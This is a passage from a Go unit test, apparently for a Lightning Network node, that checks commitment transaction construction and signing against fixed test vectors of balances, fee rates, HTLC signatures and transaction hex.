\"3045022100c9458a4d2cbb741705577deb0a890e5cb90ee141be0400d3162e533727c9cb2102206edcf765c5dc5e5f9b976ea8149bf8607b5a0efb30691138e1231302b640d2a4\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010140a83ce364747ff277f4d7595d8d15f708418798922c40bc2b056aca5485a21802000000000000000001f1090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100c9458a4d2cbb741705577deb0a890e5cb90ee141be0400d3162e533727c9cb2102206edcf765c5dc5e5f9b976ea8149bf8607b5a0efb30691138e1231302b640d2a40147304402200831422aa4e1ee6d55e0b894201770a8f8817a189356f2d70be76633ffa6a6f602200dd1b84a4855dc6727dd46c98daae43dfc70889d1ba7ef0087529a57c06e5e04012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8005d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110da966a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e04004730440220443cb07f650aebbba14b8bc8d81e096712590f524c5991ac0ed3bbc8fd3bd0c7022028a635f548e3ca64b19b69b1ea00f05b22752f91daf0b6dab78e62ba52eb7fd001483045022100f2377f7a67b7fc7f4e2c0c9e3a7de935c32417f5668eda31ea1db401b7dc53030220415fdbc8e91d0f735e70c21952342742e25249b0d062d43efbfc564499f3752601475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100f2377f7a67b7fc7f4e2c0c9e3a7de935c32417f5668eda31ea1db401b7dc53030220415fdbc8e91d0f735e70c21952342742e25249b0d062d43efbfc564499f37526\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2194,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 2,\n\t\t\t\t\tremoteSigHex: \"30450221009ed2f0a67f99e29c3c8cf45c08207b765980697781bb727fe0b1416de0e7622902206052684229bc171419ed290f4b615c943f819c0262414e43c5b91dcf72ddcf44\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101fb824d4e4dafc0f567789dee3a6bce8d411fe80f5563d8cdfdcc7d7e4447d43a0000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004830450221009ed2f0a67f99e29c3c8cf45c08207b765980697781bb727fe0b1416de0e7622902206052684229bc171419ed290f4b615c943f819c0262414e43c5b91dcf72ddcf4401473044022004ad5f04ae69c71b3b141d4db9d0d4c38d84009fb3cfeeae6efdad414487a9a0022042d3fe1388c1ff517d1da7fb4025663d372c14728ed52dc88608363450ff6a2f01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a914b43e1b38138a41b37f7cd9a1d274bc63e3a9b5d188ac6868f6010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"30440220155d3b90c67c33a8321996a9be5b82431b0c126613be751d400669da9d5c696702204318448bcd48824439d2c6a70be6e5747446be47ff45977cf41672bdc9b6b12d\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101fb824d4e4dafc0f567789dee3a6bce8d411fe80f5563d8cdfdcc7d7e4447d43a010000000000000000010a060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e05004730440220155d3b90c67c33a8321996a9be5b82431b0c126613be751d400669da9d5c696702204318448bcd48824439d2c6a70be6e5747446be47ff45977cf41672bdc9b6b12d0147304402201707050c870c1f77cc3ed58d6d71bf281de239e9eabd8ef0955bad0d7fe38dcc02204d36d80d0019b3a71e646a08fa4a5607761d341ae8be371946ebe437c289c91501008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100a12a9a473ece548584aabdd051779025a5ed4077c4b7aa376ec7a0b1645e5a48022039490b333f53b5b3e2ddde1d809e492cba2b3e5fc3a436cd3ffb4cd3d500fa5a\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101fb824d4e4dafc0f567789dee3a6bce8d411fe80f5563d8cdfdcc7d7e4447d43a020000000000000000019a090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100a12a9a473ece548584aabdd051779025a5ed4077c4b7aa376ec7a0b1645e5a48022039490b333f53b5b3e2ddde1d809e492cba2b3e5fc3a436cd3ffb4cd3d500fa5a01483045022100ff200bc934ab26ce9a559e998ceb0aee53bc40368e114ab9d3054d9960546e2802202496856ca163ac12c143110b6b3ac9d598df7254f2e17b3b94c3ab5301f4c3b0012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8005d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311040966a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402203b1b010c109c2ecbe7feb2d259b9c4126bd5dc99ee693c422ec0a5781fe161ba0220571fe4e2c649dea9c7aaf7e49b382962f6a3494963c97d80fef9a430ca3f706101483045022100d33c4e541aa1d255d41ea9a3b443b3b822ad8f7f86862638aac1f69f8f760577022007e2a18e6931ce3d3a804b1c78eda1de17dbe1fb7a95488c9a4ec8620395334801475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100d33c4e541aa1d255d41ea9a3b443b3b822ad8f7f86862638aac1f69f8f760577022007e2a18e6931ce3d3a804b1c78eda1de17dbe1fb7a95488c9a4ec86203953348\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2195,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100a8a78fa1016a5c5c3704f2e8908715a3cef66723fb95f3132ec4d2d05cd84fb4022025ac49287b0861ec21932405f5600cbce94313dbde0e6c5d5af1b3366d8afbfc\",\n\t\t\t\t\tresolutionTxHex: \"020000000001014e16c488fa158431c1a82e8f661240ec0a71ba0ce92f2721a6538c510226ad5c0000000000000000000109060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100a8a78fa1016a5c5c3704f2e8908715a3cef66723fb95f3132ec4d2d05cd84fb4022025ac49287b0861ec21932405f5600cbce94313dbde0e6c5d5af1b3366d8afbfc01483045022100be6ae1977fd7b630a53623f3f25c542317ccfc2b971782802a4f1ef538eb22b402207edc4d0408f8f38fd3c7365d1cfc26511b7cd2d4fecd8b005fba3cd5bc70439001008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100e769cb156aa2f7515d126cef7a69968629620ce82afcaa9e210969de6850df4602200b16b3f3486a229a48aadde520dbee31ae340dbadaffae74fbb56681fef27b92\",\n\t\t\t\t\tresolutionTxHex: \"020000000001014e16c488fa158431c1a82e8f661240ec0a71ba0ce92f2721a6538c510226ad5c0100000000000000000199090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100e769cb156aa2f7515d126cef7a69968629620ce82afcaa9e210969de6850df4602200b16b3f3486a229a48aadde520dbee31ae340dbadaffae74fbb56681fef27b92014730440220665b9cb4a978c09d1ca8977a534999bc8a49da624d0c5439451dd69cde1a003d022070eae0620f01f3c1bd029cc1488da13fb40fdab76f396ccd335479a11c5276d8012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8004b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110b8976a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402203b12d44254244b8ff3bb4129b0920fd45120ab42f553d9976394b099d500c99e02205e95bb7a3164852ef0c48f9e0eaf145218f8e2c41251b231f03cbdc4f29a54290147304402205e2f76d4657fb732c0dfc820a18a7301e368f5799e06b7828007633741bda6df0220458009ae59d0c6246065c419359e05eb2a4b4ef4a1b310cc912db44eb792429801475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402205e2f76d4657fb732c0dfc820a18a7301e368f5799e06b7828007633741bda6df0220458009ae59d0c6246065c419359e05eb2a4b4ef4a1b310cc912db44eb7924298\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 3702,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100dfb73b4fe961b31a859b2bb1f4f15cabab9265016dd0272323dc6a9e85885c54022059a7b87c02861ee70662907f25ce11597d7b68d3399443a831ae40e777b76bdb\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101b8de11eb51c22498fe39722c7227b6e55ff1a94146cf638458cb9bc6a060d3a30000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100dfb73b4fe961b31a859b2bb1f4f15cabab9265016dd0272323dc6a9e85885c54022059a7b87c02861ee70662907f25ce11597d7b68d3399443a831ae40e777b76bdb0147304402202765b9c9ece4f127fa5407faf66da4c5ce2719cdbe47cd3175fc7d48b482e43d02205605125925e07bad1e41c618a4b434d72c88a164981c4b8af5eaf4ee9142ec3a01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100ea9dc2a7c3c3640334dab733bb4e036e32a3106dc707b24227874fa4f7da746802204d672f7ac0fe765931a8df10b81e53a3242dd32bd9dc9331eb4a596da87954e9\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101b8de11eb51c22498fe39722c7227b6e55ff1a94146cf638458cb9bc6a060d3a30100000000000000000176050000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100ea9dc2a7c3c3640334dab733bb4e036e32a3106dc707b24227874fa4f7da746802204d672f7ac0fe765931a8df10b81e53a3242dd32bd9dc9331eb4a596da87954e9014730440220048a41c660c4841693de037d00a407810389f4574b3286afb7bc392a438fa3f802200401d71fa87c64fe621b49ac07e3bf85157ac680acb977124da28652cc7f1a5c012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8004b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431106f916a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402200e930a43c7951162dc15a2b7344f48091c74c70f7024e7116e900d8bcfba861c022066fa6cbda3929e21daa2e7e16a4b948db7e8919ef978402360d1095ffdaff7b001483045022100c1a3b0b60ca092ed5080121f26a74a20cec6bdee3f8e47bae973fcdceb3eda5502207d467a9873c939bf3aa758014ae67295fedbca52412633f7e5b2670fc7c381c101475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100c1a3b0b60ca092ed5080121f26a74a20cec6bdee3f8e47bae973fcdceb3eda5502207d467a9873c939bf3aa758014ae67295fedbca52412633f7e5b2670fc7c381c1\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 3703,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3044022044f65cf833afdcb9d18795ca93f7230005777662539815b8a601eeb3e57129a902206a4bf3e53392affbba52640627defa8dc8af61c958c9e827b2798ab45828abdd\",\n\t\t\t\t\tresolutionTxHex: \"020000000001011c076aa7fb3d7460d10df69432c904227ea84bbf3134d4ceee5fb0f135ef206d0000000000000000000175050000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022044f65cf833afdcb9d18795ca93f7230005777662539815b8a601eeb3e57129a902206a4bf3e53392affbba52640627defa8dc8af61c958c9e827b2798ab45828abdd01483045022100b94d931a811b32eeb885c28ddcf999ae1981893b21dd1329929543fe87ce793002206370107fdd151c5f2384f9ceb71b3107c69c74c8ed5a28a94a4ab2d27d3b0724012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8003a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110eb936a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400473044022047305531dd44391dce03ae20f8735005c615eb077a974edb0059ea1a311857d602202e0ed6972fbdd1e8cb542b06e0929bc41b2ddf236e04cb75edd56151f4197506014830450221008b7c191dd46893b67b628e618d2dc8e81169d38bade310181ab77d7c94c6675e02203b4dd131fd7c9deb299560983dcdc485545c98f989f7ae8180c28289f9e6bdb001475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"30450221008b7c191dd46893b67b628e618d2dc8e81169d38bade310181ab77d7c94c6675e02203b4dd131fd7c9deb299560983dcdc485545c98f989f7ae8180c28289f9e6bdb0\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 4914,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100fcb38506bfa11c02874092a843d0cc0a8613c23b639832564a5f69020cb0f6ba02206508b9e91eaa001425c190c68ee5f887e1ad5b1b314002e74db9dbd9e42dbecf\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010110a3fdcbcd5db477cd3ad465e7f501ffa8c437e8301f00a6061138590add757f0000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100fcb38506bfa11c02874092a843d0cc0a8613c23b639832564a5f69020cb0f6ba02206508b9e91eaa001425c190c68ee5f887e1ad5b1b314002e74db9dbd9e42dbecf0148304502210086e76b460ddd3cea10525fba298405d3fe11383e56966a5091811368362f689a02200f72ee75657915e0ede89c28709acd113ede9e1b7be520e3bc5cda425ecd6e68012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8003a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110ae8f6a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402206a2679efa3c7aaffd2a447fd0df7aba8792858b589750f6a1203f9259173198a022008d52a0e77a99ab533c36206cb15ad7aeb2aa72b93d4b571e728cb5ec2f6fe260147304402206d6cb93969d39177a09d5d45b583f34966195b77c7e585cf47ac5cce0c90cefb022031d71ae4e33a4e80df7f981d696fbdee517337806a3c7138b7491e2cbb077a0e01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402206d6cb93969d39177a09d5d45b583f34966195b77c7e585cf47ac5cce0c90cefb022031d71ae4e33a4e80df7f981d696fbdee517337806a3c7138b7491e2cbb077a0e\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 4915,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8002c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110fa926a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400483045022100a012691ba6cea2f73fa8bac37750477e66363c6d28813b0bb6da77c8eb3fb0270220365e99c51304b0b1a6ab9ea1c8500db186693e39ec1ad5743ee231b0138384b90147304402200769ba89c7330dfa4feba447b6e322305f12ac7dac70ec6ba997ed7c1b598d0802204fe8d337e7fee781f9b7b1a06e580b22f4f79d740059560191d7db53f876555201475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402200769ba89c7330dfa4feba447b6e322305f12ac7dac70ec6ba997ed7c1b598d0802204fe8d337e7fee781f9b7b1a06e580b22f4f79d740059560191d7db53f8765552\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 9651180,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b800222020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80ec0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311004004730440220514f977bf7edc442de8ce43ace9686e5ebdc0f893033f13e40fb46c8b8c6e1f90220188006227d175f5c35da0b092c57bea82537aed89f7778204dc5bacf4f29f2b901473044022037f83ff00c8e5fb18ae1f918ffc24e54581775a20ff1ae719297ef066c71caa9022039c529cccd89ff6c5ed1db799614533844bd6d101da503761c45c713996e3bbd01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022037f83ff00c8e5fb18ae1f918ffc24e54581775a20ff1ae719297ef066c71caa9022039c529cccd89ff6c5ed1db799614533844bd6d101da503761c45c713996e3bbd\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 9651181,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8001c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431100400473044022031a82b51bd014915fe68928d1abf4b9885353fb896cac10c3fdd88d7f9c7f2e00220716bda819641d2c63e65d3549b6120112e1aeaf1742eed94a471488e79e206b101473044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 9651936,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8001c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431100400473044022031a82b51bd014915fe68928d1abf4b9885353fb896cac10c3fdd88d7f9c7f2e00220716bda819641d2c63e65d3549b6120112e1aeaf1742eed94a471488e79e206b101473044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e\",\n\t\t},\n\t}\n\n\tfor i, test := range testCases {\n\t\texpectedCommitmentTx, err := txFromHex(test.expectedCommitmentTxHex)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Case %d: Failed to parse serialized tx: %v\", i, err)\n\t\t}\n\n\t\t// Build required HTLC structs from raw test vector data.\n\t\thtlcs := make([]channeldb.HTLC, len(test.htlcDescs), len(test.htlcDescs))\n\t\tfor i, htlcDesc := range test.htlcDescs {\n\t\t\thtlcs[i], err = tc.getHTLC(i, &htlcDesc)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t}\n\t\ttheHTLCView := htlcViewFromHTLCs(htlcs)\n\n\t\tfeePerKw := chainfee.SatPerKWeight(test.commitment.FeePerKw)\n\t\tisOurs := true\n\t\theight := test.commitment.CommitHeight\n\n\t\t// Create unsigned commitment transaction.\n\t\tview, err := channel.commitBuilder.createUnsignedCommitmentTx(\n\t\t\ttest.commitment.LocalBalance,\n\t\t\ttest.commitment.RemoteBalance, isOurs, feePerKw,\n\t\t\theight, theHTLCView, keys,\n\t\t)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Case %d: Failed to create new commitment tx: %v\", i, err)\n\t\t\tcontinue\n\t\t}\n\n\t\tcommitmentView := &commitment{\n\t\t\tourBalance: view.ourBalance,\n\t\t\ttheirBalance: view.theirBalance,\n\t\t\ttxn: view.txn,\n\t\t\tfee: view.fee,\n\t\t\theight: height,\n\t\t\tfeePerKw: feePerKw,\n\t\t\tdustLimit: tc.dustLimit,\n\t\t\tisOurs: isOurs,\n\t\t}\n\n\t\t// Initialize LocalCommit, which is used in getSignedCommitTx.\n\t\tchannelState.LocalCommitment = test.commitment\n\t\tchannelState.LocalCommitment.Htlcs = htlcs\n\t\tchannelState.LocalCommitment.CommitTx = commitmentView.txn\n\n\t\t// This is the remote party's signature over the commitment\n\t\t// transaction which is included in the commitment tx's witness\n\t\t// data.\n\t\tchannelState.LocalCommitment.CommitSig, err = hex.DecodeString(test.remoteSigHex)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Case %d: Failed to parse serialized signature: %v\",\n\t\t\t\ti, err)\n\t\t}\n\n\t\tcommitTx, err := channel.getSignedCommitTx()\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Case %d: Failed to sign commitment tx: %v\", i, err)\n\t\t\tcontinue\n\t\t}\n\n\t\t// Check that commitment transaction was created correctly.\n\t\tif commitTx.WitnessHash() != *expectedCommitmentTx.WitnessHash() {\n\t\t\tt.Errorf(\"Case %d: Generated unexpected 